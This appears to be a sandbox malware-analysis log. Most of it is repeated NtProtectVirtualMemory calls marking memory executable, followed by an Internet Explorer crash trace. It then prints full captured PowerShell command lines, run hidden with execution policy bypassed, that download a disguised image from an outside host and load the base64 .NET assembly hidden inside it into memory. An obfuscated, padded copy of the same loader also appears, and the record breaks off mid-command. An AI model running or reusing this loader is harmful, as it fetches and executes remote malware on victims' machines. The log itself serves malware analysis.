heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c01000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bad000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bb4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076bd2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc1d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdc44000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdad1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077186000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772d6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077181000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076ba0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076b9a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772af000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772bb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe117000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdbe4000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 3068 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 111928176
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 111934128
registers.r11: 111929936
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1905685317
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 564
thread_handle: 0x00000000000004e0
process_identifier: 1720
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€b